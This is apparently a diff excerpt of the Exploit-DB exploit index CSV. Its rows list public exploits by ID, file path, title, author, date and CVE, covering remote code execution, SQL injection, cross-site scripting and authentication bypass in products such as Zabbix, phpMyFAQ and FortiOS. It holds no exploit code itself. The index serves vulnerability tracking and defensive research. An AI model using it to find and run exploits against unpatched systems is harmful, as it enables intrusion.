51419,exploits/php/webapps/51419.txt,"KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)",2023-05-05,nu11secur1ty,webapps,php,,2023-05-05,2023-05-05,0,,,,,,
37388,exploits/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4632;OSVDB-123654;OSVDB-123653,,,,http://www.exploit-db.comKoha-3.20.00.zip,
37389,exploits/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2016-08-31,0,CVE-2015-4631;CVE-2015-4630,,,,http://www.exploit-db.comKoha-3.20.00.zip,
@ -24531,6 +24546,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49422,exploits/php/webapps/49422.py,"Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)",2021-01-14,"Haboob Team",webapps,php,,2021-01-14,2021-01-18,0,CVE-2020-35578,,,,,
3919,exploits/php/webapps/3919.txt,"NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion",2007-05-14,"ThE TiGeR",webapps,php,,2007-05-13,2016-10-05,1,OSVDB-36054;CVE-2007-2710;CVE-2007-2709,,,,http://www.exploit-db.comnagiosql-2.00-P00.tar.gz,
24415,exploits/php/webapps/24415.txt,"Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-28,CyruxNET,webapps,php,,2004-08-28,2013-01-27,1,CVE-2004-1640;OSVDB-9394,,,,,https://www.securityfocus.com/bid/11064/info
52229,exploits/php/webapps/52229.py,"NagVis 1.9.33 - Arbitrary File Read",2025-04-16,xerosec,webapps,php,,2025-04-16,2025-04-16,0,CVE-2022-46945,,,,,
37270,exploits/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,webapps,php,80,2015-06-12,2015-06-12,0,OSVDB-123303;OSVDB-123302;OSVDB-123301;OSVDB-123300;OSVDB-123299;OSVDB-123298;OSVDB-123297,,,,http://www.exploit-db.comkilrizzy-Nakid-CMS-f274624.tar.gz,
13893,exploits/php/webapps/13893.txt,"Nakid CMS 0.5.2 - 'FCKeditor' Arbitrary File Upload",2010-06-16,eidelweiss,webapps,php,,2010-06-15,2010-08-31,0,,,,,http://www.exploit-db.comNakidCMSv_0_5_2.rar,
13889,exploits/php/webapps/13889.txt,"Nakid CMS 0.5.2 - Remote File Inclusion",2010-06-16,sh00t0ut,webapps,php,,2010-06-15,,0,CVE-2010-2358;OSVDB-65543,,,,http://www.exploit-db.comNakidCMSv_0_5_2.rar,
@ -27624,6 +27640,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42761,exploits/php/webapps/42761.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (1)",2017-09-21,"Ishaq Mohammed",webapps,php,,2017-09-21,2017-11-17,0,CVE-2017-14618,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip,
42987,exploits/php/webapps/42987.txt,"phpMyFAQ 2.9.8 - Cross-Site Scripting (2)",2017-10-13,"Ishaq Mohammed",webapps,php,,2017-10-13,2017-11-17,0,CVE-2017-14619,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip,
43063,exploits/php/webapps/43063.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (3)",2017-10-28,"Nikhil Mittal",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15727,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip,
52226,exploits/php/webapps/52226.txt,"phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)",2025-04-16,CodeSecLab,webapps,php,,2025-04-16,2025-04-16,0,CVE-2022-4407,,,,,
52235,exploits/php/webapps/52235.txt,"phpMyFAQ 3.2.10 - Unintended File Download Triggered by Embedded Frames",2025-04-16,Geo,webapps,php,,2025-04-16,2025-04-16,0,CVE-2024-55889,,,,,
33385,exploits/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",webapps,php,,2009-12-01,2016-09-27,1,CVE-2009-4780;OSVDB-60586,,,,http://www.exploit-db.comphpmyfaq-2.5.3.zip,https://www.securityfocus.com/bid/37180/info
51399,exploits/php/webapps/51399.txt,"phpMyFAQ v3.1.12 - CSV Injection",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
27586,exploits/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php?type' CRLF Injection",2006-04-10,Psych0,webapps,php,,2006-04-10,2013-08-14,1,CVE-2006-1714;OSVDB-24705,,,,,https://www.securityfocus.com/bid/17420/info
@ -30129,6 +30147,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40904,exploits/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",webapps,php,,2016-12-12,2016-12-12,0,,,,,,
49290,exploits/php/webapps/49290.txt,"Smart Hospital 3.1 - _Add Patient_ Stored XSS",2020-12-18,"Kislay Kumar",webapps,php,,2020-12-18,2020-12-18,0,,,,,,
34689,exploits/php/webapps/34689.txt,"Smart Magician Blog 1.0 - Multiple SQL Injections",2009-08-27,Evil-Cod3r,webapps,php,,2009-08-27,2014-09-18,1,,,,,,https://www.securityfocus.com/bid/43376/info
52247,exploits/php/webapps/52247.txt,"Smart Manager 8.27.0 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,php,,2025-04-16,2025-04-16,0,CVE-2024-0566,,,,,
36386,exploits/php/webapps/36386.txt,"Smart PHP Poll - Authentication Bypass",2015-03-16,"Mr.tro0oqy yemen",webapps,php,,2015-03-16,2015-03-16,1,OSVDB-119631,,,,http://www.exploit-db.comsmart_php_poll.zip,
10437,exploits/php/webapps/10437.txt,"Smart PHP Subscriber - Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic",webapps,php,,2009-12-13,,1,CVE-2007-0518;OSVDB-32946,,,,,
10727,exploits/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Arbitrary File Upload",2009-12-27,Phenom,webapps,php,,2009-12-26,,1,,,,,http://www.exploit-db.comphpuploader.zip,
@ -34884,6 +34903,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47474,exploits/php/webapps/47474.pl,"Zabbix 4.4 - Authentication Bypass",2019-10-08,"Todor Donev",webapps,php,,2019-10-08,2019-10-10,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
49202,exploits/php/webapps/49202.txt,"Zabbix 5.0.0 - Stored XSS via URL Widget Iframe",2020-12-04,"Shwetabh Vishnoi",webapps,php,,2020-12-04,2020-12-04,0,,,,,,
50816,exploits/php/webapps/50816.py,"Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)",2022-03-10,"Hussien Misbah",webapps,php,,2022-03-10,2022-03-10,0,,,,,,
52230,exploits/php/webapps/52230.py,"Zabbix 7.0.0 - SQL Injection",2025-04-16,m4nb4,webapps,php,,2025-04-16,2025-04-16,0,CVE-2024-42327,,,,,
33288,exploits/php/webapps/33288.txt,"Zainu 1.0 - 'searchSongKeyword' Cross-Site Scripting",2009-10-14,"drunken danish rednecks",webapps,php,,2009-10-14,2014-05-10,1,CVE-2009-4523;OSVDB-61466,,,,,https://www.securityfocus.com/bid/36701/info
26604,exploits/php/webapps/26604.txt,"Zainu 2.0 - SQL Injection",2005-11-28,r0t,webapps,php,,2005-11-28,2013-07-05,1,CVE-2005-3884;OSVDB-21197,,,,,https://www.securityfocus.com/bid/15579/info
24235,exploits/php/webapps/24235.txt,"ZaireWeb Solutions NewsLetter ZWS - Administrative Interface Authentication Bypass",2004-06-24,GaMeS,webapps,php,,2004-06-24,2013-01-20,1,CVE-2004-0621;OSVDB-16040,,,,,https://www.securityfocus.com/bid/10605/info
@ -35098,6 +35118,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42650,exploits/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,remote,python,2375,2017-09-11,2017-09-11,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/c91ef1f09274d7f0efaf89c3740ceca316cca0b3/modules/exploits/linux/http/docker_daemon_tcp.rb
50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",2022-01-05,"Jeremiasz Pluta",remote,python,,2022-01-05,2022-01-05,0,CVE-2021-43857,,,,,
42599,exploits/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,remote,python,,2017-08-31,2017-09-01,1,CVE-2017-1000117,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/202c936868328a4fe665c9d2ea82b8f8a2610b6e/modules/exploits/multi/http/git_submodule_command_exec.rb
52227,exploits/python/remote/52227.txt,"Hugging Face Transformers MobileViTV2 4.41.1 - Remote Code Execution (RCE)",2025-04-16,"The Kernel Panic",remote,python,,2025-04-16,2025-04-16,0,CVE-2024-11392,,,,,https://drive.google.com/file/d/14bnNaCRmFOQvPHUR9zQwdbjMmzKE2pZl/view?usp=drive_link
41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python,,2017-03-24,2017-04-04,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/a93aef8b7adecc4059c6cf168dd181e169cbc0b2/modules/exploits/linux/http/logsign_exec.rb
46075,exploits/python/remote/46075.rb,"Mailcleaner - (Authenticated) Remote Code Execution (Metasploit)",2019-01-07,"Mehmet Ince",remote,python,443,2019-01-07,2019-03-17,0,,"Metasploit Framework (MSF)",,,,
41942,exploits/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,remote,python,22,2017-04-27,2017-04-27,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/bbee7f86b5c1bd8b2e245b98fce1cb858b327948/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
@ -43283,6 +43304,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35509,exploits/windows/remote/35509.pl,"FLVPlayer4Free 2.9 - '.fp4f' Remote Buffer Overflow",2011-03-27,KedAns-Dz,remote,windows,,2011-03-27,2014-12-09,1,,,,,,https://www.securityfocus.com/bid/47045/info
3063,exploits/windows/remote/3063.pl,"Formbankserver 1.9 - 'Name' Directory Traversal",2007-01-01,Bl0od3r,remote,windows,,2006-12-31,,1,OSVDB-32545;CVE-2007-0055,,,,,
19942,exploits/windows/remote/19942.txt,"Fortech Proxy+ 2.30 - Remote Administration",1999-12-26,anonymous,remote,windows,,1999-12-26,2012-07-19,1,OSVDB-84754,,,,,https://www.securityfocus.com/bid/1226/info
52239,exploits/windows/remote/52239.py,"Fortinet FortiOS_ FortiProxy_ and FortiSwitchManager 7.2.0 - Authentication bypass",2025-04-16,ub3rsick,remote,windows,,2025-04-16,2025-04-16,0,CVE-2022-40684,,,,,
44941,exploits/windows/remote/44941.txt,"Foxit Reader 9.0.1.1049 - Remote Code Execution",2018-06-25,mr_me,remote,windows,,2018-06-25,2018-06-25,1,CVE-2018-9958;CVE-2018-9948,"Use After Free (UAF)",,http://www.exploit-db.com/screenshots/idlt45000/poc.png,http://www.exploit-db.comFoxitReader901_enu_Setup_Prom.exe,
24502,exploits/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow (Metasploit)",2013-02-14,Metasploit,remote,windows,,2013-02-14,2013-02-14,1,OSVDB-89030,"Metasploit Framework (MSF)",,,http://www.exploit-db.comFoxitReader544.1128_enu_Setup.exe,http://secunia.com/advisories/51733/
854,exploits/windows/remote/854.cpp,"Foxmail 1.1.0.1 - POP3 Temp Dir Stack Overflow",2005-03-02,Swan,remote,windows,110,2005-03-01,,1,OSVDB-14370;CVE-2005-0635,,,,,
@ -45834,6 +45856,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35434,exploits/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure",2011-03-09,"Aaron Sigel",remote,windows,,2011-03-09,2014-12-03,1,CVE-2011-0167;OSVDB-73773,,,,,https://www.securityfocus.com/bid/46816/info
20125,exploits/windows/remote/20125.txt,"Weblogic 3.1.8/4.0.4/4.5.1 - Remote Command Execution",2000-08-01,"Foundstone Inc.",remote,windows,,2000-08-01,2012-07-31,1,CVE-2000-0685;OSVDB-59351,,,,,https://www.securityfocus.com/bid/1525/info
29843,exploits/windows/remote/29843.txt,"webMethods Glue 6.5.1 Console - Directory Traversal",2007-04-11,"Patrick Webster",remote,windows,,2007-04-11,2013-11-27,1,CVE-2007-2048;OSVDB-34992,,,,,https://www.securityfocus.com/bid/23423/info
52237,exploits/windows/remote/52237.txt,"WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page",2025-04-16,"Rasime Ekici",remote,windows,,2025-04-16,2025-04-16,0,CVE-2024-23733,,,,,
3395,exploits/windows/remote/3395.c,"WebMod 0.48 - Content-Length Remote Buffer Overflow",2007-03-01,cybermind,remote,windows,,2007-02-28,,1,OSVDB-33834;CVE-2007-1260,,,,,
23411,exploits/windows/remote/23411.txt,"Websense Enterprise 4/5 - Blocked Sites Cross-Site Scripting",2003-12-03,"Mr. P.Taylor",remote,windows,,2003-12-03,2012-12-16,1,OSVDB-2901,,,,,https://www.securityfocus.com/bid/9149/info
16802,exploits/windows/remote/16802.rb,"Webster HTTP Server - GET Buffer Overflow (Metasploit)",2010-11-03,Metasploit,remote,windows,,2010-11-03,2011-03-07,1,CVE-2002-2268;OSVDB-44106,"Metasploit Framework (MSF)",,,,

Can't render this file because it is too large.